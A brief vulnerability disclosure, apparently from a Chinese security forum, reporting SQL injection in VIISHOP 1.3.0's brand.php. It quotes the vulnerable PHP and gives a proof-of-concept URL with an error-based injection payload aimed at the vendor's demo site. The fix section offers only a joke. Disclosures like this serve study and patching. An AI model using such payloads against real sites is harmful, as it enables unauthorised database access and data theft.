/*******************************************************/ /* VIISHOP 1.3.0 SQL Injection Vulnerability /* ======================== /* By: : Kn1f3 /* E-Mail : 681796@qq.com /*******************************************************/ /* Welcome to https://www.90sec.com */ /*******************************************************/ //index.php 首页文件 //index.php 首页文件 $GLOBALS['_REQUEST'] = isset( $_REQUEST ) ? $_REQUEST : ""; define( "BASEDIR", dirname( __FILE__ ) ); include_once( BASEDIR."/config/db_config.php" ); include_once( BASEDIR."/include/common.inc.php" ); if ( !isset( $_REQUEST['p'] ) ) {                                 $GLOBALS['_REQUEST']['p'] = "index"; } $inc = str_replace( array( ":", "/", "..", ".", ";", "\\", "http", "ftp" ), "", $_REQUEST['p'] ); $inc = eregi_replace( "[^_a-zA-Z0-9]", "", $inc ); if ( !include( "system/{$inc}.php" ) )  //包含 进行了过滤 查看system目录下文件 {                                 show_msg( "error_once", "index.php" ); } 问题出在brand.php文件中 $brand_list = $db->fetch_array( $db->query( "SELECT * FROM {$prefix}brand WHERE uid = '{$brand_id}'" ) ); //$prefix 和 $brand_id 未初始化没有进行任何过滤就带入查询了 poc: https://demo.viishop.com/index.ph ... 28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28select%20version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29

修复方案:


推荐80sec 的防注入代码 哈哈哈哈